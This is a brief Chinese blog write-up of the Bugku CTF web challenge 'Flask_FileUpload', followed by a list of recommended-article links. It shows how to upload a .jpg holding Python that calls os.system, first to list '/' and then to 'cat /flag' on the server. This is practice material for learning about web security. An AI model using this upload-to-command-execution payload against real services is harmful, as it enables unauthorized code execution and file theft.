Bugku-web-Flask_FileUpload

黑白时光les2024-08-01 11:52

Bugku-web-Flask_FileUpload

查看源代码,提示用python返回结果

在file.jpg中写python代码

复制代码 
import os
os.system('ls / ')

上传后查看源代码,找到flag文件夹

修改代码

复制代码 
import os
os.system('cat /flag ')
相关推荐
skylar018 分钟前
小白1分钟安装flash-attn
开发语言·python
JustNow_Man21 分钟前
psmux快捷键
人工智能·python
默子昂26 分钟前
ollama 自定义ui
开发语言·python·ui
abcy07121326 分钟前
Python中使用FastAPI和HDFS进行异步文件上传
python·fastapi
abcy07121327 分钟前
flask hdfs 异步上传图文教程csdn
python·flask
#麻辣小龙虾#41 分钟前
基于vue3.0开发一款【固废与废气运维管理系统】(支持源码)
前端·vue.js·vue3
Cosolar1 小时前
Docsify零构建文档站完全指南:从快速搭建到企业级部署
前端·开源·github
在放️1 小时前
Python 爬虫 · PyQuery 模块基础
爬虫·python
weixin_471383031 小时前
Taro-02-页面路由
前端·taro
装不满的克莱因瓶1 小时前
【自动驾驶领域】学习 Cityscapes 数据集——城市街景语义理解的标准基准
人工智能·pytorch·python·深度学习·学习·机器学习·自动驾驶
热门推荐
01HTTP 与 HTTPS 的区别:从原理到实战详解022026 AI 编程工具终极实战指南:Cursor vs Claude Code vs Copilot,开发者该怎么选?03【AI】2026 年具身智能模型和世界模型总结042026年6月AI行业全景:从百模大战到Agent元年,这30天发生了什么?05GitHub 镜像站点06AI科技热点日报 | 2026年6月1日07《置身钉内》原文-可播放阅读08Claude Code、Codex、Cursor三分天下:2026年AI编程Agent生态全景剖析092026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf10AI一周事件 · 2026-06-03 至 2026-06-09